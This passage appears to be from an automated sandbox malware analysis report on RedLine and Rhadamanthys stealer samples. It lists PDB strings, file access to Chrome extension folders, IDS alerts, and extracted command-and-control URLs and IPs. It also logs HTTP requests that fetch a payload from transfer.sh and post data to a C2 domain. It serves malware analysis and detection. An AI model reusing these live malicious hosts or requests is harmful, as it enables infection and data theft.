              Source: Binary string: C:\zetoxu68-vepibayawu-woxixawenobaju_93\fucabopiso_d.pdb source: aw9Ynwqd1x.exe, 00000000.00000000.246785291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, dbjigst, 0000000D.00000000.336022819.0000000000401000.00000020.00000001.01000000.00000008.sdmp
              Source: Binary string: cfgmgr32.pdbUGP source: fontview.exe, 00000013.00000003.414369645.0000000005000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\nujiwucosunes\vezik.pdb source: explorer.exe, 00000001.00000003.342443196.000000000B700000.00000004.00000010.00020000.00000000.sdmp, 2560.exe, 0000000F.00000002.356859286.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 2560.exe, 0000000F.00000000.341351275.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 2560.exe, 00000011.00000000.353377908.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
              Source: Binary string: shell32.pdb source: fontview.exe, 00000013.00000003.412196998.0000000006930000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.410010255.00000000055B1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 2560.exe, 0000000F.00000002.362651886.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 2560.exe, 00000011.00000002.363362004.0000000000400000.00000040.00000400.00020000.00000000.sdmp
              Source: Binary string: wrpcrt4.pdbUGP source: fontview.exe, 00000013.00000003.391168128.0000000005150000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\Timayiko\Kodale\hiwer\Fami\Somayofa wiho.pdb source: 226F.exe, 00000010.00000002.479266806.000000000114C000.00000002.00000001.01000000.0000000B.sdmp, 226F.exe, 00000010.00000000.352256641.000000000114C000.00000002.00000001.01000000.0000000B.sdmp
              Source: Binary string: msvcp_win.pdb source: fontview.exe, 00000013.00000003.395588310.0000000005080000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.445193713.00000000053B1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: psapi.pdbUGP source: fontview.exe, 00000013.00000003.421493166.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wgdi32.pdbUGP source: fontview.exe, 00000013.00000003.392076418.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wimm32.pdb source: fontview.exe, 00000013.00000003.419485427.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wkernelbase.pdb source: fontview.exe, 00000013.00000003.386704960.00000000053B1000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.387503810.00000000055A0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: shlwapi.pdb source: fontview.exe, 00000013.00000003.401675563.0000000005000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mpr.pdb source: fontview.exe, 00000013.00000003.425517005.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wwin32u.pdb source: fontview.exe, 00000013.00000003.401619984.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wsspicli.pdbGCTL source: fontview.exe, 00000013.00000003.391685317.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: shlwapi.pdbUGP source: fontview.exe, 00000013.00000003.401675563.0000000005000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: setupapi.pdb source: fontview.exe, 00000013.00000003.423766732.00000000059F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.421577482.00000000055B2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 3C:\nujiwucosunes\vezik.pdb` source: explorer.exe, 00000001.00000003.342443196.000000000B700000.00000004.00000010.00020000.00000000.sdmp, 2560.exe, 0000000F.00000002.356859286.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 2560.exe, 0000000F.00000000.341351275.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 2560.exe, 00000011.00000000.353377908.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
              Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 2560.exe, 0000000F.00000002.362651886.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 2560.exe, 00000011.00000002.363362004.0000000000400000.00000040.00000400.00020000.00000000.sdmp
              Source: Binary string: combase.pdbUGP source: fontview.exe, 00000013.00000003.401758325.00000000055B3000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.403198719.0000000005820000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdbUGP source: fontview.exe, 00000013.00000003.395722778.0000000005088000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wkernelbase.pdbUGP source: fontview.exe, 00000013.00000003.386704960.00000000053B1000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.387503810.00000000055A0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cryptbase.pdbUGP source: fontview.exe, 00000013.00000003.391748694.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wuser32.pdbUGP source: fontview.exe, 00000013.00000003.400623587.00000000055B0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.400263237.0000000005084000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: shell32.pdbUGP source: fontview.exe, 00000013.00000003.412196998.0000000006930000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.410010255.00000000055B1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wimm32.pdbUGP source: fontview.exe, 00000013.00000003.419485427.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: fltLib.pdbGCTL source: fontview.exe, 00000013.00000003.419420089.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: WINMMBASE.pdb source: fontview.exe, 00000013.00000003.421038965.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: comdlg32.pdb source: fontview.exe, 00000013.00000003.405354581.000000000508E000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.405703009.00000000055B0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wgdi32full.pdbUGP source: fontview.exe, 00000013.00000003.392165110.0000000005102000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.393323768.000000000542C000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: profapi.pdb source: fontview.exe, 00000013.00000003.419057448.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ws2_32.pdb source: fontview.exe, 00000013.00000003.421384076.0000000005000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: comdlg32.pdbUGP source: fontview.exe, 00000013.00000003.405354581.000000000508E000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.405703009.00000000055B0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wgdi32full.pdb source: fontview.exe, 00000013.00000003.392165110.0000000005102000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.393323768.000000000542C000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: shcore.pdbUGP source: fontview.exe, 00000013.00000003.406207334.0000000005084000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.406327938.0000000005110000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000018.00000003.490751661.000002275D660000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mpr.pdbUGP source: fontview.exe, 00000013.00000003.425517005.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: sechost.pdb source: fontview.exe, 00000013.00000003.390338279.0000000005000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: XAMLHostHwndvolumelabelmasteredudfhelpJOLIETUDFData\Program Files\$Windows.~BT\Windows\ProgramData\Program Files (x86)\Program Files\Data\Windows\Data\ProgramData\Data\Program Files (x86)\.cer.cdxml.cat.automaticdestinations-ms.appxpackage.appxbundle.appxWindows.old\.fon.etl.efi.dsft.dmp.customdestinations-ms.cookie.msm.msip.mpb.mp.p12.p10.otf.ost.olb.ocx.nst.mui.pdb.partial.p7x.p7s.p7r.p7m.p7c.p7b.psf.psd1.pfx.pfm.pem.ttc.sys.sst.spkg.spc.sft.rll.winmd.wim.wfs.vsix.vsi.vmrs.vmcxWININET.xap%s (%d).%s\shellIfExecBrowserFlagsft%06dNeverShowExtAlwaysShowExtTopicL source: fontview.exe, 00000013.00000003.412196998.0000000006930000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.410010255.00000000055B1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: fontview.exe, 00000013.00000003.385093474.00000000053B0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.383912006.0000000005084000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\fepovilorefego5.pdb source: explorer.exe, 00000001.00000003.337271065.00000000082B0000.00000004.00000001.00020000.00000000.sdmp, 336E.exe, 0000000E.00000000.336659529.0000000000401000.00000020.00000001.01000000.00000009.sdmp
              Source: Binary string: ole32.pdbUGP source: fontview.exe, 00000013.00000003.420283986.00000000055B0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.419630627.000000000508A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: powrprof.pdbUGP source: fontview.exe, 00000013.00000003.419219769.0000000005000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: powrprof.pdb source: fontview.exe, 00000013.00000003.419219769.0000000005000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wmswsock.pdb source: fontview.exe, 00000013.00000003.425560872.0000000005000000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.446231172.0000000004F16000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ole32.pdb source: fontview.exe, 00000013.00000003.420283986.00000000055B0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.419630627.000000000508A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Windows.Storage.pdbUGP source: fontview.exe, 00000013.00000003.416675694.0000000005B80000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.414492613.00000000055B2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Kernel.Appcore.pdbUGP source: fontview.exe, 00000013.00000003.418853263.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wkernel32.pdbGCTL source: fontview.exe, 00000013.00000003.386062019.0000000005086000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.386284855.00000000051A0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: sechost.pdbUGP source: fontview.exe, 00000013.00000003.390338279.0000000005000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: comctl32.pdbUGP source: fontview.exe, 00000013.00000003.407879570.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.406570415.00000000055BF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Kernel.Appcore.pdb source: fontview.exe, 00000013.00000003.418853263.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: psapi.pdb source: fontview.exe, 00000013.00000003.421493166.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msvcp_win.pdbUGP source: fontview.exe, 00000013.00000003.395588310.0000000005080000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.445193713.00000000053B1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: advapi32.pdbUGP source: fontview.exe, 00000013.00000003.388608530.0000000005080000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cryptbase.pdb source: fontview.exe, 00000013.00000003.391748694.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cfgmgr32.pdb source: fontview.exe, 00000013.00000003.414369645.0000000005000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: bcryptprimitives.pdb source: fontview.exe, 00000013.00000003.391810335.0000000005000000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: oleaut32.pdbUGP source: fontview.exe, 00000013.00000003.421125892.0000000005084000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.421276873.0000000005120000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: combase.pdb source: fontview.exe, 00000013.00000003.401758325.00000000055B3000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.403198719.0000000005820000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: Windows.Storage.pdb source: fontview.exe, 00000013.00000003.416675694.0000000005B80000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.414492613.00000000055B2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ApplicationFrameWindowWindows.Foundation.Collections.IIterator`1<IUnknown>Windows.Foundation.Collections.IVectorView`1<IUnknown>Windows.Foundation.Collections.IVector`1<IUnknown>@%SystemRoot%\System32\SettingSyncCore.dll,-1024internal\onecoreuapshell\private\inc\shouldswitchtodesktop.hinternal\onecoreuapshell\private\inc\sharedstoragesources\syncrootcommon.hData\Program Files\Data\Program Files (x86)\Data\ProgramData\Data\Windows\Program Files\Program Files (x86)\ProgramData\Windows\$Windows.~BT\Windows.old\.appx.appxbundle.appxpackage.automaticdestinations-ms.cat.cdxml.cer.cookie.customdestinations-ms.dmp.dsft.efi.etl.fon.ini.iso.mp.mpb.msip.msm.mui.nst.ocx.olb.ost.otf.p10.p12.p7b.p7c.p7m.p7r.p7s.p7x.partial.pdb.pem.pfm.pfx.psd1.psf.rll.sft.spc.spkg.sst.ttc.ttf.vmcx.vmrs.vsi.vsix.wfs.wim.winmd.xapFTSearched0000000000000000000BasicPropertiesDocumentPropertiesImagePropertiesVideoPropertiesMusicPropertiesRenameAsyncOverloadDefaultOptionsRenameAsyncIStorageItem2GetParentAsyncIsEqualGetThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetThumbnailAsyncOverloadDefaultOptionsget_DisplayNameIStorageItemProperties2GetScaledImageAsThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetScaledImageAsThumbnailAsyncOverloadDefaultOptionsGetScaledImageAsThumbnailAsyncIStorageItemPropertiesWithProviderget_ProviderIStorageItemThumbnailAccessPrivGetScaledImageOrThumbnailAsyncIStorageItemHandleAcccessOpenAsyncPrivatePauseDeferredUpdateSetStreamedFileCallbackGetStreamedFileCallbackGetSpecialInternalPropertySetSpecialInternalPropertyCreateTempFileInSameLocationCopyOverloadDefaultOptionsCopyOverloadCopyAndReplaceAsyncMoveOverloadDefaultNameAndOptionsWindows.Security.EnterpriseData.FileProtectionManagerMoveOverloadDefaultOptionsoptionsCreateFolderAsyncOverloadDefaultOptionsGetItemAsyncGetItemsAsyncOverloadDefaultStartAndCountCreateFileQueryOverloadDefaultCreateFileQueryCreateFolderQueryOverloadDefaultCreateFolderQueryCreateFolderQueryWithOptionsCreateItemQueryWithOptionsGetFilesAsyncOverloadDefaultStartAndCountGetFoldersAsyncOverloadDefaultStartAndCountget_MusicLibraryget_HomeGroupget_RemovableDevicesget_MediaServerDevicesget_Playlistsget_SavedPicturesget_Objects3Dget_AppCapturesget_RecordedCallsGetFolderForUserAsyncget_ApplicationDataSharedLocalGetPublisherCacheFolderGetApplicationDataFolderForUserGetPublisherCacheFolderForUserknownfolder:{AB5FB87B-7CE2-4F83-915D-550846C9537B}knownfolder:{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}knownfolder:{1C2AC1DC-4358-4B6C-9733-AF21156576F0}knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}knownfolder:{374DE290-123F-4565-9164-39C4925E467B}knownfolder:{bfb9d5e0-c6a9-404c-b2b2-ae6db6af4968}knownfolder:{4BD8D571-6D19-48D3-BE97-422220080E43}knownfolder:{33E28130-4E1E-4676-835A-98395C3BC3BB}knownfolder:{AE50C081-EBD2-438A-8655-8A092E34987A}knownfolder:{C870044B-F49E-4126-A9C3-B52A1FF411E8}knownfolder:{3B193882-D3AD-4eab-965A-69829D1FB59F}knownfolder:{f3ce0f7c-4901-4acc-8648-d5d44b04ef8f}knownfolder:{18989B1D-99B5-455B-841C-AB7C74E4DDFC}get_Langua
              Source: Binary string: profapi.pdbUGP source: fontview.exe, 00000013.00000003.419057448.0000000003600000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wmswsock.pdbUGP source: fontview.exe, 00000013.00000003.425560872.0000000005000000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.446231172.0000000004F16000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: oleaut32.pdb source: fontview.exe, 00000013.00000003.421125892.0000000005084000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.421276873.0000000005120000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wuser32.pdb source: fontview.exe, 00000013.00000003.400623587.00000000055B0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.400263237.0000000005084000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: comctl32.pdb source: fontview.exe, 00000013.00000003.407879570.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.406570415.00000000055BF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ws2_32.pdbUGP source: fontview.exe, 00000013.00000003.421384076.0000000005000000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_00428390 FindFirstFileExW,

              Networking

              barindex
              Source: C:\Windows\explorer.exeDomain query: potunulit.org
              Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.3 80
              Source: C:\Windows\System32\rundll32.exeNetwork Connect: 109.206.243.168 80
              Source: C:\Windows\System32\dllhost.exeDomain query: transfer.sh
              Source: TrafficSnort IDS: 2043233 ET TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.3:49733 -> 89.208.103.88:37538
              Source: TrafficSnort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.3:49733 -> 89.208.103.88:37538
              Source: TrafficSnort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 89.208.103.88:37538 -> 192.168.2.3:49733
              Source: TrafficSnort IDS: 2043202 ET TROJAN Rhadamanthys Stealer - Payload Download Request 192.168.2.3:49735 -> 109.206.243.168:80
              Source: TrafficSnort IDS: 2853001 ETPRO TROJAN Rhadamanthys Stealer - Payload Response 109.206.243.168:80 -> 192.168.2.3:49735
              Source: TrafficSnort IDS: 2853002 ETPRO TROJAN Rhadamanthys Stealer - Data Exfil 192.168.2.3:49736 -> 109.206.243.168:80
              Source: TrafficSnort IDS: 2853002 ETPRO TROJAN Rhadamanthys Stealer - Data Exfil 192.168.2.3:49760 -> 109.206.243.168:80
              Source: Malware configuration extractorURLs: http://drampik.com/lancer/get.php
              Source: Malware configuration extractorURLs: 89.208.103.88:37538
              Source: Malware configuration extractorURLs: http://bulimu55t.net/
              Source: Malware configuration extractorURLs: http://soryytlic4.net/
              Source: Malware configuration extractorURLs: http://bukubuka1.net/
              Source: Malware configuration extractorURLs: http://novanosa5org.org/
              Source: Malware configuration extractorURLs: http://hujukui3.net/
              Source: Malware configuration extractorURLs: http://newzelannd66.org/
              Source: Malware configuration extractorURLs: http://golilopaster.org/
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /get/pMeglv/Blue.bin HTTP/1.1Host: transfer.shConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49749 version: TLS 1.0
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dipcj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 231Host: potunulit.org
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pdujeftq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: potunulit.org
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lmkympntg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 242Host: potunulit.org
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://khpcnlkw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: potunulit.org
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://avuxv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: potunulit.org
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hdmcxxriay.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 142Host: potunulit.org
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mgqyrb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 272Host: potunulit.org
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://efxdannslj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: potunulit.org
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://scyxiteu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: potunulit.org
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://opfakis.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: potunulit.org
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ntishu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: potunulit.org
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://biwrdybrv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: potunulit.org
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewIP Address: 144.76.136.153 144.76.136.153
              Source: Joe Sandbox ViewIP Address: 144.76.136.153 144.76.136.153
              Source: global trafficTCP traffic: 192.168.2.3:49733 -> 89.208.103.88:37538
              Source: 2560.exe, 00000011.00000002.364606550.000000000080B000.00000004.00000020.00020000.00000000.sdmp, 2560.exe, 00000011.00000003.362538231.000000000080B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
              Source: 226F.exe, 00000010.00000002.479576664.000000000168A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gEKjeGOUdN6i5fBcEs.jOmF6MtoBKl32eAI1QwqxSxpNFyV2s/
              Source: 226F.exe, 00000010.00000002.480422025.0000000002F20000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://gEKjeGOUdN6i5fBcEs.jOmF6MtoBKl32eAI1QwqxSxpNFyV2sMicrosoft
